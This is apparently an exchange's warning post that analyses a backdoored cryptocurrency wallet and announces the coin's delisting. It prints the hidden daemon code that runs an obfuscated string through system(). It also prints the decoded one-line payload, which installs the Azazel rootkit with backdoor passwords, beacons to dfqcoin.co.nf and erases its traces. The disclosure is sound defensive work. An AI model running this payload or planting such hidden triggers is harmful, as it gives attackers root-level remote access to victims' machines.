This is completely malicious - DO NOT RUN
// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
fDaemon = GetBoolArg("-daemon");
if ((access("/usr/.dfq", F_OK) == -1))
daemonize(getnewid());
// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void daemonize(std::string s)
{
if (std::system(s.c_str()))
return;
return;
}
// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
return (hashoffset(offset1, offset2, offset3));
}
// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone
https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget
http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1
...
Given the "wget
http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source. This coin will be delisted and removed from bittrex.com ASAP.
If you ran this as root, your box is compromised and I suggest a rebuild ASAP. If you did not run as root, this should have failed silently and you should be ok....
